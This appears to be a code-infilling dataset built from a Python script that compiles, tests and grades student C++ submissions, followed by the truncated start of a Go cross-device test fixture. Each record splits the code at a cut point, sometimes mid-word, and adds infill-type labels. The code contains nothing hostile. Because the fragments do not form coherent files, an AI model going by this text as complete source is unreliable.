total = int(total)
right = total - wrong
else:
print('\n'.join(lines))
right = int(input("Failed to parse score, input correct number manually: "))
total = int(input("Total tests: "))
comp = right / total
output = '\n'.join([lines[0]]+lines[2:])
return (100 * comp, output, right, total)
def main():
ap = argparse.ArgumentParser()
ap.add_argument('-s', '--submissions', type=str, required=True,
help="Directory containing student submissions")
ap.add_argument('-t', '--template', type=str, required=True,
help="Directory containing the assignment materials and tests")
ap.add_argument('-w', '--working', type=str, default='./tmp',
help="Temporary working directory")
ap.add_argument('-o', '--output', type=str, default='./output',
help="Directory where marked output is stored.")
# TODO: Add zip functionality
args=ap.parse_args()
args.submissions = os.path.abspath(args.submissions)
args.template = os.path.abspath(args.template)
args.working = os.path.abspath(args.working)
args.output = os.path.abspath(args.output)
# Check if necessary directories exist
if not os.path.isdir(args.submissions):
print("Submission directory does not exist", file=sys.stderr)
exit(1)
if not os.path.isdir(args.template):
print("Assignment template directory does not exist", file=sys.stderr)
exit(1)
if os.path.isdir(args.working):
shutil.rmtree(args.working)
os.mkdir(args.working)
if os.path.isdir(args.output):
shutil.rmtree(args.output)
os.mkdir(args.output)
# Run through each submission and try it
loadTmpDir(args.submissions, args.template, args.working, args.output)
shutil.rmtree(args.working)
if __name__ == "__main__":
main()
| os.environ.get('EDITOR'):
subprocess.run([os.environ.get("EDITOR"), fname])
else: # Rudimentary backup editor
lines = []
while True:
try:
line = input(">>>")
except EOFError:
break
lines.append(line)
contents = '\n'.join(lines)
with open(fname, 'w') as FILE:
FILE.write(contents)
print("\r", end='')
d | identifier_body |
mark.py | #!/bin/env python3
# Evan Wilde (c) 2017
# My big insane marking script of doom 😈
import argparse
import os
import sys
import csv
import re
import shutil
import subprocess
from subprocess import call
username_pattern = r".*\((.*)\)$"
username_expr = re.compile(username_pattern)
test_pattern = r"(100|[1-9][0-9]|[0-9])% tests passed, ([0-9]+) tests failed out of ([0-9]+)"
test_expr = re.compile(test_pattern)
## Helper Functions
# Deletes files in folder, it ignores filenames in ignore list
def removeFiles(folder, ignore=[], skipdirs=True):
"Deletes all files that are in folder"
for f in os.listdir(folder):
if f in ignore:
continue
try:
fpath = os.path.join(folder, f)
if os.path.isfile(fpath):
os.remove(fpath)
elif os.path.isdir(fpath) and not skipdirs:
shutil.rmtree(fpath)
except Exception as e:
print(f"Threw an exception {e}")
# from, to (copies all files in from, to the to dir)
def copyContents(f, t):
"Copy all files in f into t dir"
[shutil.copy(os.path.join(f, p), t)
if os.path.isfile(os.path.join(f, p))
else shutil.copytree(os.path.join(f, p), os.path.join(t, p))
for p in os.listdir(f)]
## Viewer Modes
def editFile(fname):
if os.environ.get('EDITOR'):
subprocess.run([os.environ.get("EDITOR"), fname])
else: # Rudimentary backup editor
lines = []
while True:
try:
line = input(">>>")
except EOFError:
break
lines.append(line)
contents = '\n'.join(lines)
with open(fname, 'w') as FILE:
FILE.write(contents)
print("\r", end='')
def appendToFile(fname, content):
with open(fname, 'a+') as FILE:
FILE.write(content)
# Show stuff
def viewData(content):
PAGER = os.environ.get('PAGER')
if PAGER and len(content.split('\n')) > 20:
if PAGER == 'less':
subprocess.run([os.environ.get("PAGER"), '-N'], input=content.encode('utf-8'))
else:
subprocess.run([os.environ.get("PAGER")], input=content.encode('utf-8'))
else:
os.system("clear")
print(content)
# Read a file and show it
def viewFile(fname):
if os.path.isfile(fname):
with open(fname, 'r') as FILE:
viewData(FILE.read())
# Get files in a directory
def getFiles(dirc):
return [x for x in os.listdir(dirc) if x is not os.path.isdir(x)]
# Prompt user to select an item
def selectItems(itms):
prmt = '\t' + '\n\t'.join([f"({num+1}): {nm}"
for num, nm in enumerate(itms)]) + '\n [1] >>: '
while True:
i = input(prmt)
if i == '':
return (0, itms[0])
try:
select = int(i)
except ValueError:
continue
if select <= len(itms) and select > 0:
return (select-1, itms[select-1])
## Main Functions
def loadTmpDir(submissiondir, assndir, tmpdir, outputdir):
"""Load user submission to staging area
Loads the testing files into the tmpdir
Will create build folder and cd into that for compiling and marking
Calls the compile and marking functions.
If the program does not compile, the submission receives a zero and is not
passed forward to marking.
:rootdir: The root directory where the assignments are (directory with
student names)
:tmpdir: Where compilation and marking are occurring
:assndir: location where original assignment is kept
"""
# Deals with the joys of connex BS
# Copy and open grade file
in_gradefname = os.path.join(submissiondir, 'grades.csv')
out_gradefname = os.path.join(outputdir, 'grades.csv')
if not os.path.exists(in_gradefname):
print("grade.csv doesn't exist", "Re-download submissions from Connex with grade.csv included", sep="\n", file=sys.stderr)
exit(1)
with open(in_gradefname, 'r') as gradeFile:
gradeReader = csv.reader(gradeFile, delimiter=',')
l = [row for row in gradeReader]
header = l[:3]
order = [stud[1] for stud in l[3:]]
details = {stud[1]: stud for stud in l[3:]}
submissions = {username_expr.search(p).groups()[0]: p for p in os.listdir(submissiondir) if username_expr.search(p)}
assert len(details) == len(submissions) # If these don't match, panic
cwd = os.getcwd() # Store this so we can go back to it later
# And here we go with actually driving this stupid boat
for idx, f in enumerate(details):
submission_path = os.path.join(submissiondir, submissions[f], "Submission attachment(s)")
output_path = os.path.join(outputdir, submissions[f])
# If it has already been marked, show the marks and copy the comments file
if details[f][-1]:
if os.path.isfile(os.path.join(submissiondir, submissions[f], 'comments.txt')):
shutil.copy(os.path.join(submissiondir, submissions[f], 'comments.txt'), tmpdir)
resp = input(f"{f}[{details[f][-1]}] already marked: Remark? [y/N]:")
if resp.lower() != 'y':
# Copy comment file
if not os.path.isfile(os.path.abspath("./comments.txt")):
wit | if not os.path.isdir(output_path):
os.mkdir(output_path)
shutil.copy(os.path.abspath("./comments.txt"),
os.path.join(output_path, "comments.txt"))
continue
copyContents(submission_path, tmpdir)
copyContents(assndir, tmpdir) # Will overwrite anything already there
if not os.path.isdir(os.path.join(tmpdir, 'build')):
os.mkdir(os.path.join(tmpdir, 'build'))
os.chdir(os.path.join(tmpdir, 'build'))
compiled, compile_msg = cpp_compile() # compile submission
if compiled:
score, output, correct, total = mark()
else:
score = 0
output = "Failed to compile"
correct = 0
total = 0
# Okay, back to the workdir for comments and shipping the mark
os.chdir(tmpdir)
options = ["Keep",
"Comment",
"Replace Grade",
"Show Compiler Output",
"Show Test Output",
"Show Comment",
"Append compiler message",
"Append Test Output",
"View Submission"]
while True:
print(f"""Marking {submissions[f]}:
Student {idx+1} / {len(details)}
Mark: {score} ({correct} / {total})""")
cidx, cmd = selectItems(options)
if cidx == 0:
break
elif cidx == 1: # Comment on file
editFile(os.path.abspath("./comments.txt"))
continue
elif cidx == 2: # Change grade
score = round(float(input("New Grade: ")), 2)
continue
elif cidx == 3:
viewData(compile_msg)
elif cidx == 4:
viewData(output)
elif cidx == 5:
viewFile(os.path.abspath("./comments.txt"))
elif cidx == 6:
appendToFile(os.path.abspath("./comments.txt"),
'\n'.join(["\n<pre>","=== [Compiler Output] =========",
compile_msg, "</pre>"]))
elif cidx == 7:
appendToFile(os.path.abspath("./comments.txt"),
'\n'.join(["\n<pre>", "=== [Test Output] =============",
output, "</pre>"]) )
elif cidx == 8:
submittedFiles = getFiles(submission_path)
if len(submittedFiles) > 1:
_, fname = selectItems(submittedFiles)
else:
fname = submittedFiles[0]
viewFile(os.path.abspath("./" + fname))
else:
print(cidx, cmd)
# Once everything is hunky dory, put away their mark and move on
details[f][-1] = score
if not os.path.isfile(os.path.abspath("./comments.txt")):
with open(os.path.abspath("./comments.txt"), 'w'):
pass # Just create it and leave
if not os.path.isdir(output_path):
os.mkdir(output_path)
shutil.copy(os.path.abspath("./comments.txt"),
os.path.join(output_path, "comments.txt"))
removeFiles(os.path.join(tmpdir, "build"), skipdirs=False)
shutil.rmtree(os.path.join(tmpdir, "tests"))
removeFiles(tmpdir, skipdirs=False)
os.chdir(cwd)
# Write grades to grade file
with open(out_gradefname, "w") as outputgrades:
csv_writer = csv.writer(outputgrades, dialect='unix')
[csv_writer.writerow(el) for el in header]
[csv_writer.writerow(details[stud]) for stud in order]
return details
# Compile submission
def cpp_compile(threads=2):
"""Compile the user submission
CMakeLists.txt should be in the cwd
:returns: True/False depending on if the program compiles
"""
cmake_ret = subprocess.run(["cmake", "../"], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = cmake_ret.stdout
errors = cmake_ret.stderr
output = ""
errors = ""
make_ret = subprocess.run(["make", f"-j{threads}"], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = make_ret.stdout
errors = make_ret.stderr
return (make_ret.returncode == 0, errors if make_ret != 0 else None)
# Mark submission loaded in tmp dir
def mark():
"""Mark student submissions using the test file
Runs "make test" in cwd
:returns: score
"""
test_ret = subprocess.run(["make", "test"], encoding='utf-8',
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = test_ret.stdout
errors = test_ret.stderr
lines = output.split('\n')
# find the line with the info we are looking for
i = 0
for idx, l in enumerate(lines):
if "% tests passed," in l:
i = idx
m = test_expr.search(lines[i])
if m:
perc, wrong, total = m.groups()
perc = float(perc) / 100 # percent
wrong = int(wrong)
total = int(total)
right = total - wrong
else:
print('\n'.join(lines))
right = int(input("Failed to parse score, input correct number manually: "))
total = int(input("Total tests: "))
comp = right / total
output = '\n'.join([lines[0]]+lines[2:])
return (100 * comp, output, right, total)
def main():
ap = argparse.ArgumentParser()
ap.add_argument('-s', '--submissions', type=str, required=True,
help="Directory containing student submissions")
ap.add_argument('-t', '--template', type=str, required=True,
help="Directory containing the assignment materials and tests")
ap.add_argument('-w', '--working', type=str, default='./tmp',
help="Temporary working directory")
ap.add_argument('-o', '--output', type=str, default='./output',
help="Directory where marked output is stored.")
# TODO: Add zip functionality
args=ap.parse_args()
args.submissions = os.path.abspath(args.submissions)
args.template = os.path.abspath(args.template)
args.working = os.path.abspath(args.working)
args.output = os.path.abspath(args.output)
# Check if necessary directories exist
if not os.path.isdir(args.submissions):
print("Submission directory does not exist", file=sys.stderr)
exit(1)
if not os.path.isdir(args.template):
print("Assignment template directory does not exist", file=sys.stderr)
exit(1)
if os.path.isdir(args.working):
shutil.rmtree(args.working)
os.mkdir(args.working)
if os.path.isdir(args.output):
shutil.rmtree(args.output)
os.mkdir(args.output)
# Run through each submission and try it
loadTmpDir(args.submissions, args.template, args.working, args.output)
shutil.rmtree(args.working)
if __name__ == "__main__":
main()
| h open(os.path.abspath("./comments.txt"), 'w'):
pass # Just create it and leave
| conditional_block |
mark.py | #!/bin/env python3
# Evan Wilde (c) 2017
# My big insane marking script of doom 😈
import argparse
import os
import sys
import csv
import re
import shutil
import subprocess
from subprocess import call
username_pattern = r".*\((.*)\)$"
username_expr = re.compile(username_pattern)
test_pattern = r"(100|[1-9][0-9]|[0-9])% tests passed, ([0-9]+) tests failed out of ([0-9]+)"
test_expr = re.compile(test_pattern)
## Helper Functions
# Deletes files in folder, it ignores filenames in ignore list
def removeFiles(folder, ignore=[], skipdirs=True):
"Deletes all files that are in folder"
for f in os.listdir(folder):
if f in ignore:
continue
try:
fpath = os.path.join(folder, f)
if os.path.isfile(fpath):
os.remove(fpath)
elif os.path.isdir(fpath) and not skipdirs:
shutil.rmtree(fpath)
except Exception as e:
print(f"Threw an exception {e}")
# from, to (copies all files in from, to the to dir)
def copyContents(f, t):
"Copy all files in f into t dir"
[shutil.copy(os.path.join(f, p), t)
if os.path.isfile(os.path.join(f, p))
else shutil.copytree(os.path.join(f, p), os.path.join(t, p))
for p in os.listdir(f)]
## Viewer Modes
def editFile(fname):
if os.environ.get('EDITOR'):
subprocess.run([os.environ.get("EDITOR"), fname])
else: # Rudimentary backup editor
lines = []
while True:
try:
line = input(">>>")
except EOFError:
break
lines.append(line)
contents = '\n'.join(lines)
with open(fname, 'w') as FILE:
FILE.write(contents)
print("\r", end='')
def appendToFile(fname, content):
with open(fname, 'a+') as FILE:
FILE.write(content)
# Show stuff
def viewData(content):
PAGER = os.environ.get('PAGER')
if PAGER and len(content.split('\n')) > 20:
if PAGER == 'less':
subprocess.run([os.environ.get("PAGER"), '-N'], input=content.encode('utf-8'))
else:
subprocess.run([os.environ.get("PAGER")], input=content.encode('utf-8'))
else:
os.system("clear")
print(content)
# Read a file and show it
def viewFile(fname):
if os.path.isfile(fname):
with open(fname, 'r') as FILE:
viewData(FILE.read())
# Get files in a directory
def get | rc):
return [x for x in os.listdir(dirc) if x is not os.path.isdir(x)]
# Prompt user to select an item
def selectItems(itms):
prmt = '\t' + '\n\t'.join([f"({num+1}): {nm}"
for num, nm in enumerate(itms)]) + '\n [1] >>: '
while True:
i = input(prmt)
if i == '':
return (0, itms[0])
try:
select = int(i)
except ValueError:
continue
if select <= len(itms) and select > 0:
return (select-1, itms[select-1])
## Main Functions
def loadTmpDir(submissiondir, assndir, tmpdir, outputdir):
"""Load user submission to staging area
Loads the testing files into the tmpdir
Will create build folder and cd into that for compiling and marking
Calls the compile and marking functions.
If the program does not compile, the submission receives a zero and is not
passed forward to marking.
:rootdir: The root directory where the assignments are (directory with
student names)
:tmpdir: Where compilation and marking are occurring
:assndir: location where original assignment is kept
"""
# Deals with the joys of connex BS
# Copy and open grade file
in_gradefname = os.path.join(submissiondir, 'grades.csv')
out_gradefname = os.path.join(outputdir, 'grades.csv')
if not os.path.exists(in_gradefname):
print("grade.csv doesn't exist", "Re-download submissions from Connex with grade.csv included", sep="\n", file=sys.stderr)
exit(1)
with open(in_gradefname, 'r') as gradeFile:
gradeReader = csv.reader(gradeFile, delimiter=',')
l = [row for row in gradeReader]
header = l[:3]
order = [stud[1] for stud in l[3:]]
details = {stud[1]: stud for stud in l[3:]}
submissions = {username_expr.search(p).groups()[0]: p for p in os.listdir(submissiondir) if username_expr.search(p)}
assert len(details) == len(submissions) # If these don't match, panic
cwd = os.getcwd() # Store this so we can go back to it later
# And here we go with actually driving this stupid boat
for idx, f in enumerate(details):
submission_path = os.path.join(submissiondir, submissions[f], "Submission attachment(s)")
output_path = os.path.join(outputdir, submissions[f])
# If it has already been marked, show the marks and copy the comments file
if details[f][-1]:
if os.path.isfile(os.path.join(submissiondir, submissions[f], 'comments.txt')):
shutil.copy(os.path.join(submissiondir, submissions[f], 'comments.txt'), tmpdir)
resp = input(f"{f}[{details[f][-1]}] already marked: Remark? [y/N]:")
if resp.lower() != 'y':
# Copy comment file
if not os.path.isfile(os.path.abspath("./comments.txt")):
with open(os.path.abspath("./comments.txt"), 'w'):
pass # Just create it and leave
if not os.path.isdir(output_path):
os.mkdir(output_path)
shutil.copy(os.path.abspath("./comments.txt"),
os.path.join(output_path, "comments.txt"))
continue
copyContents(submission_path, tmpdir)
copyContents(assndir, tmpdir) # Will overwrite anything already there
if not os.path.isdir(os.path.join(tmpdir, 'build')):
os.mkdir(os.path.join(tmpdir, 'build'))
os.chdir(os.path.join(tmpdir, 'build'))
compiled, compile_msg = cpp_compile() # compile submission
if compiled:
score, output, correct, total = mark()
else:
score = 0
output = "Failed to compile"
correct = 0
total = 0
# Okay, back to the workdir for comments and shipping the mark
os.chdir(tmpdir)
options = ["Keep",
"Comment",
"Replace Grade",
"Show Compiler Output",
"Show Test Output",
"Show Comment",
"Append compiler message",
"Append Test Output",
"View Submission"]
while True:
print(f"""Marking {submissions[f]}:
Student {idx+1} / {len(details)}
Mark: {score} ({correct} / {total})""")
cidx, cmd = selectItems(options)
if cidx == 0:
break
elif cidx == 1: # Comment on file
editFile(os.path.abspath("./comments.txt"))
continue
elif cidx == 2: # Change grade
score = round(float(input("New Grade: ")), 2)
continue
elif cidx == 3:
viewData(compile_msg)
elif cidx == 4:
viewData(output)
elif cidx == 5:
viewFile(os.path.abspath("./comments.txt"))
elif cidx == 6:
appendToFile(os.path.abspath("./comments.txt"),
'\n'.join(["\n<pre>","=== [Compiler Output] =========",
compile_msg, "</pre>"]))
elif cidx == 7:
appendToFile(os.path.abspath("./comments.txt"),
'\n'.join(["\n<pre>", "=== [Test Output] =============",
output, "</pre>"]) )
elif cidx == 8:
submittedFiles = getFiles(submission_path)
if len(submittedFiles) > 1:
_, fname = selectItems(submittedFiles)
else:
fname = submittedFiles[0]
viewFile(os.path.abspath("./" + fname))
else:
print(cidx, cmd)
# Once everything is hunky dory, put away their mark and move on
details[f][-1] = score
if not os.path.isfile(os.path.abspath("./comments.txt")):
with open(os.path.abspath("./comments.txt"), 'w'):
pass # Just create it and leave
if not os.path.isdir(output_path):
os.mkdir(output_path)
shutil.copy(os.path.abspath("./comments.txt"),
os.path.join(output_path, "comments.txt"))
removeFiles(os.path.join(tmpdir, "build"), skipdirs=False)
shutil.rmtree(os.path.join(tmpdir, "tests"))
removeFiles(tmpdir, skipdirs=False)
os.chdir(cwd)
# Write grades to grade file
with open(out_gradefname, "w") as outputgrades:
csv_writer = csv.writer(outputgrades, dialect='unix')
[csv_writer.writerow(el) for el in header]
[csv_writer.writerow(details[stud]) for stud in order]
return details
# Compile submission
def cpp_compile(threads=2):
"""Compile the user submission
CMakeLists.txt should be in the cwd
:returns: True/False depending on if the program compiles
"""
cmake_ret = subprocess.run(["cmake", "../"], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = cmake_ret.stdout
errors = cmake_ret.stderr
output = ""
errors = ""
make_ret = subprocess.run(["make", f"-j{threads}"], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = make_ret.stdout
errors = make_ret.stderr
return (make_ret.returncode == 0, errors if make_ret != 0 else None)
# Mark submission loaded in tmp dir
def mark():
"""Mark student submissions using the test file
Runs "make test" in cwd
:returns: score
"""
test_ret = subprocess.run(["make", "test"], encoding='utf-8',
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = test_ret.stdout
errors = test_ret.stderr
lines = output.split('\n')
# find the line with the info we are looking for
i = 0
for idx, l in enumerate(lines):
if "% tests passed," in l:
i = idx
m = test_expr.search(lines[i])
if m:
perc, wrong, total = m.groups()
perc = float(perc) / 100 # percent
wrong = int(wrong)
total = int(total)
right = total - wrong
else:
print('\n'.join(lines))
right = int(input("Failed to parse score, input correct number manually: "))
total = int(input("Total tests: "))
comp = right / total
output = '\n'.join([lines[0]]+lines[2:])
return (100 * comp, output, right, total)
def main():
ap = argparse.ArgumentParser()
ap.add_argument('-s', '--submissions', type=str, required=True,
help="Directory containing student submissions")
ap.add_argument('-t', '--template', type=str, required=True,
help="Directory containing the assignment materials and tests")
ap.add_argument('-w', '--working', type=str, default='./tmp',
help="Temporary working directory")
ap.add_argument('-o', '--output', type=str, default='./output',
help="Directory where marked output is stored.")
# TODO: Add zip functionality
args=ap.parse_args()
args.submissions = os.path.abspath(args.submissions)
args.template = os.path.abspath(args.template)
args.working = os.path.abspath(args.working)
args.output = os.path.abspath(args.output)
# Check if necessary directories exist
if not os.path.isdir(args.submissions):
print("Submission directory does not exist", file=sys.stderr)
exit(1)
if not os.path.isdir(args.template):
print("Assignment template directory does not exist", file=sys.stderr)
exit(1)
if os.path.isdir(args.working):
shutil.rmtree(args.working)
os.mkdir(args.working)
if os.path.isdir(args.output):
shutil.rmtree(args.output)
os.mkdir(args.output)
# Run through each submission and try it
loadTmpDir(args.submissions, args.template, args.working, args.output)
shutil.rmtree(args.working)
if __name__ == "__main__":
main()
| Files(di | identifier_name |
mark.py | #!/bin/env python3
# Evan Wilde (c) 2017
# My big insane marking script of doom 😈
import argparse
import os
import sys
import csv
import re
import shutil
import subprocess
from subprocess import call
username_pattern = r".*\((.*)\)$"
username_expr = re.compile(username_pattern)
test_pattern = r"(100|[1-9][0-9]|[0-9])% tests passed, ([0-9]+) tests failed out of ([0-9]+)"
test_expr = re.compile(test_pattern)
## Helper Functions
# Deletes files in folder, it ignores filenames in ignore list
def removeFiles(folder, ignore=[], skipdirs=True):
"Deletes all files that are in folder"
for f in os.listdir(folder):
if f in ignore:
continue
try:
fpath = os.path.join(folder, f)
if os.path.isfile(fpath):
os.remove(fpath)
elif os.path.isdir(fpath) and not skipdirs:
shutil.rmtree(fpath)
except Exception as e:
print(f"Threw an exception {e}")
# from, to (copies all files in from, to the to dir)
def copyContents(f, t):
"Copy all files in f into t dir"
[shutil.copy(os.path.join(f, p), t)
if os.path.isfile(os.path.join(f, p))
else shutil.copytree(os.path.join(f, p), os.path.join(t, p))
for p in os.listdir(f)]
## Viewer Modes
def editFile(fname):
if os.environ.get('EDITOR'):
subprocess.run([os.environ.get("EDITOR"), fname])
else: # Rudimentary backup editor
lines = []
while True:
try:
line = input(">>>")
except EOFError:
break
lines.append(line)
contents = '\n'.join(lines)
with open(fname, 'w') as FILE:
FILE.write(contents)
print("\r", end='')
def appendToFile(fname, content):
with open(fname, 'a+') as FILE:
FILE.write(content)
# Show stuff
def viewData(content):
PAGER = os.environ.get('PAGER')
if PAGER and len(content.split('\n')) > 20:
if PAGER == 'less':
subprocess.run([os.environ.get("PAGER"), '-N'], input=content.encode('utf-8'))
else:
subprocess.run([os.environ.get("PAGER")], input=content.encode('utf-8'))
else:
os.system("clear")
print(content)
# Read a file and show it
def viewFile(fname):
if os.path.isfile(fname):
with open(fname, 'r') as FILE:
viewData(FILE.read())
# Get files in a directory
def getFiles(dirc):
return [x for x in os.listdir(dirc) if x is not os.path.isdir(x)]
# Prompt user to select an item
def selectItems(itms):
prmt = '\t' + '\n\t'.join([f"({num+1}): {nm}"
for num, nm in enumerate(itms)]) + '\n [1] >>: '
while True:
i = input(prmt)
if i == '':
return (0, itms[0])
try:
select = int(i)
except ValueError:
continue
if select <= len(itms) and select > 0:
return (select-1, itms[select-1])
## Main Functions
def loadTmpDir(submissiondir, assndir, tmpdir, outputdir):
"""Load user submission to staging area
Loads the testing files into the tmpdir
Will create build folder and cd into that for compiling and marking
Calls the compile and marking functions.
If the program does not compile, the submission receives a zero and is not
passed forward to marking.
:rootdir: The root directory where the assignments are (directory with
student names)
:tmpdir: Where compilation and marking are occurring
:assndir: location where original assignment is kept
"""
# Deals with the joys of connex BS
# Copy and open grade file
in_gradefname = os.path.join(submissiondir, 'grades.csv')
out_gradefname = os.path.join(outputdir, 'grades.csv')
if not os.path.exists(in_gradefname):
print("grade.csv doesn't exist", "Re-download submissions from Connex with grade.csv included", sep="\n", file=sys.stderr)
exit(1)
with open(in_gradefname, 'r') as gradeFile:
gradeReader = csv.reader(gradeFile, delimiter=',')
l = [row for row in gradeReader]
header = l[:3]
order = [stud[1] for stud in l[3:]]
details = {stud[1]: stud for stud in l[3:]}
submissions = {username_expr.search(p).groups()[0]: p for p in os.listdir(submissiondir) if username_expr.search(p)}
assert len(details) == len(submissions) # If these don't match, panic
cwd = os.getcwd() # Store this so we can go back to it later
# And here we go with actually driving this stupid boat
for idx, f in enumerate(details):
submission_path = os.path.join(submissiondir, submissions[f], "Submission attachment(s)")
output_path = os.path.join(outputdir, submissions[f])
# If it has already been marked, show the marks and copy the comments file
if details[f][-1]:
if os.path.isfile(os.path.join(submissiondir, submissions[f], 'comments.txt')):
shutil.copy(os.path.join(submissiondir, submissions[f], 'comments.txt'), tmpdir)
resp = input(f"{f}[{details[f][-1]}] already marked: Remark? [y/N]:")
if resp.lower() != 'y':
# Copy comment file
if not os.path.isfile(os.path.abspath("./comments.txt")):
with open(os.path.abspath("./comments.txt"), 'w'):
pass # Just create it and leave
if not os.path.isdir(output_path):
os.mkdir(output_path)
shutil.copy(os.path.abspath("./comments.txt"),
os.path.join(output_path, "comments.txt"))
continue
copyContents(submission_path, tmpdir)
copyContents(assndir, tmpdir) # Will overwrite anything already there
if not os.path.isdir(os.path.join(tmpdir, 'build')):
os.mkdir(os.path.join(tmpdir, 'build'))
os.chdir(os.path.join(tmpdir, 'build'))
compiled, compile_msg = cpp_compile() # compile submission
if compiled:
score, output, correct, total = mark()
else:
score = 0
output = "Failed to compile"
correct = 0
total = 0
# Okay, back to the workdir for comments and shipping the mark
os.chdir(tmpdir)
options = ["Keep",
"Comment",
"Replace Grade",
"Show Compiler Output",
"Show Test Output",
"Show Comment",
"Append compiler message",
"Append Test Output",
"View Submission"]
while True:
print(f"""Marking {submissions[f]}:
Student {idx+1} / {len(details)}
Mark: {score} ({correct} / {total})""")
cidx, cmd = selectItems(options)
if cidx == 0:
break
elif cidx == 1: # Comment on file
editFile(os.path.abspath("./comments.txt"))
continue
elif cidx == 2: # Change grade
score = round(float(input("New Grade: ")), 2)
continue
elif cidx == 3:
viewData(compile_msg)
elif cidx == 4:
viewData(output)
elif cidx == 5:
viewFile(os.path.abspath("./comments.txt"))
elif cidx == 6:
appendToFile(os.path.abspath("./comments.txt"),
'\n'.join(["\n<pre>","=== [Compiler Output] =========",
compile_msg, "</pre>"])) | elif cidx == 8:
submittedFiles = getFiles(submission_path)
if len(submittedFiles) > 1:
_, fname = selectItems(submittedFiles)
else:
fname = submittedFiles[0]
viewFile(os.path.abspath("./" + fname))
else:
print(cidx, cmd)
# Once everything is hunky dory, put away their mark and move on
details[f][-1] = score
if not os.path.isfile(os.path.abspath("./comments.txt")):
with open(os.path.abspath("./comments.txt"), 'w'):
pass # Just create it and leave
if not os.path.isdir(output_path):
os.mkdir(output_path)
shutil.copy(os.path.abspath("./comments.txt"),
os.path.join(output_path, "comments.txt"))
removeFiles(os.path.join(tmpdir, "build"), skipdirs=False)
shutil.rmtree(os.path.join(tmpdir, "tests"))
removeFiles(tmpdir, skipdirs=False)
os.chdir(cwd)
# Write grades to grade file
with open(out_gradefname, "w") as outputgrades:
csv_writer = csv.writer(outputgrades, dialect='unix')
[csv_writer.writerow(el) for el in header]
[csv_writer.writerow(details[stud]) for stud in order]
return details
# Compile submission
def cpp_compile(threads=2):
"""Compile the user submission
CMakeLists.txt should be in the cwd
:returns: True/False depending on if the program compiles
"""
cmake_ret = subprocess.run(["cmake", "../"], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = cmake_ret.stdout
errors = cmake_ret.stderr
output = ""
errors = ""
make_ret = subprocess.run(["make", f"-j{threads}"], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = make_ret.stdout
errors = make_ret.stderr
return (make_ret.returncode == 0, errors if make_ret != 0 else None)
# Mark submission loaded in tmp dir
def mark():
"""Mark student submissions using the test file
Runs "make test" in cwd
:returns: score
"""
test_ret = subprocess.run(["make", "test"], encoding='utf-8',
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = test_ret.stdout
errors = test_ret.stderr
lines = output.split('\n')
# find the line with the info we are looking for
i = 0
for idx, l in enumerate(lines):
if "% tests passed," in l:
i = idx
m = test_expr.search(lines[i])
if m:
perc, wrong, total = m.groups()
perc = float(perc) / 100 # percent
wrong = int(wrong)
total = int(total)
right = total - wrong
else:
print('\n'.join(lines))
right = int(input("Failed to parse score, input correct number manually: "))
total = int(input("Total tests: "))
comp = right / total
output = '\n'.join([lines[0]]+lines[2:])
return (100 * comp, output, right, total)
def main():
ap = argparse.ArgumentParser()
ap.add_argument('-s', '--submissions', type=str, required=True,
help="Directory containing student submissions")
ap.add_argument('-t', '--template', type=str, required=True,
help="Directory containing the assignment materials and tests")
ap.add_argument('-w', '--working', type=str, default='./tmp',
help="Temporary working directory")
ap.add_argument('-o', '--output', type=str, default='./output',
help="Directory where marked output is stored.")
# TODO: Add zip functionality
args=ap.parse_args()
args.submissions = os.path.abspath(args.submissions)
args.template = os.path.abspath(args.template)
args.working = os.path.abspath(args.working)
args.output = os.path.abspath(args.output)
# Check if necessary directories exist
if not os.path.isdir(args.submissions):
print("Submission directory does not exist", file=sys.stderr)
exit(1)
if not os.path.isdir(args.template):
print("Assignment template directory does not exist", file=sys.stderr)
exit(1)
if os.path.isdir(args.working):
shutil.rmtree(args.working)
os.mkdir(args.working)
if os.path.isdir(args.output):
shutil.rmtree(args.output)
os.mkdir(args.output)
# Run through each submission and try it
loadTmpDir(args.submissions, args.template, args.working, args.output)
shutil.rmtree(args.working)
if __name__ == "__main__":
main() | elif cidx == 7:
appendToFile(os.path.abspath("./comments.txt"),
'\n'.join(["\n<pre>", "=== [Test Output] =============",
output, "</pre>"]) ) | random_line_split |
fixture.go | // Copyright 2021 The ChromiumOS Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package crossdevice
import (
"context"
"encoding/json"
"io/ioutil"
"path/filepath"
"strconv"
"strings"
"time"
"chromiumos/tast/common/android/adb"
crossdevicecommon "chromiumos/tast/common/cros/crossdevice"
"chromiumos/tast/common/testexec"
"chromiumos/tast/ctxutil"
"chromiumos/tast/errors"
"chromiumos/tast/local/bluetooth"
"chromiumos/tast/local/chrome"
"chromiumos/tast/local/chrome/ash"
"chromiumos/tast/local/chrome/crossdevice/crossdevicesettings"
"chromiumos/tast/local/chrome/crossdevice/phonehub"
"chromiumos/tast/local/chrome/lacros/lacrosfixt"
"chromiumos/tast/local/chrome/uiauto"
"chromiumos/tast/local/chrome/uiauto/faillog"
"chromiumos/tast/local/cryptohome"
"chromiumos/tast/local/input"
"chromiumos/tast/local/logsaver"
"chromiumos/tast/testing"
)
// FixtureOptions contains the options that we set for various crossDeviceFixture.
type FixtureOptions struct {
allFeatures bool // Whether or not to enable all cross device features.
saveScreenRecording bool
lockFixture bool // Whether or not to lock the fixture preventing chrome from being torn down outside of fixture teardown.
noSignIn bool // Whether or not to sign in with the specified GAIA account. True will not skip OOBE.
}
// NewCrossDeviceOnboarded creates a fixture that logs in to CrOS, pairs it with an Android device,
// and ensures the features in the "Connected devices" section of OS Settings are ready to use (Smart Lock, Phone Hub, etc.).
// Note that crossdevice fixtures inherit from crossdeviceAndroidSetup.
func NewCrossDeviceOnboarded(opt FixtureOptions, fOpt chrome.OptionsCallback) testing.FixtureImpl {
return &crossdeviceFixture{
fOpt: fOpt,
allFeatures: opt.allFeatures,
saveScreenRecording: opt.saveScreenRecording,
lockFixture: opt.lockFixture,
noSignIn: opt.noSignIn,
}
}
// Fixture runtime variables.
const (
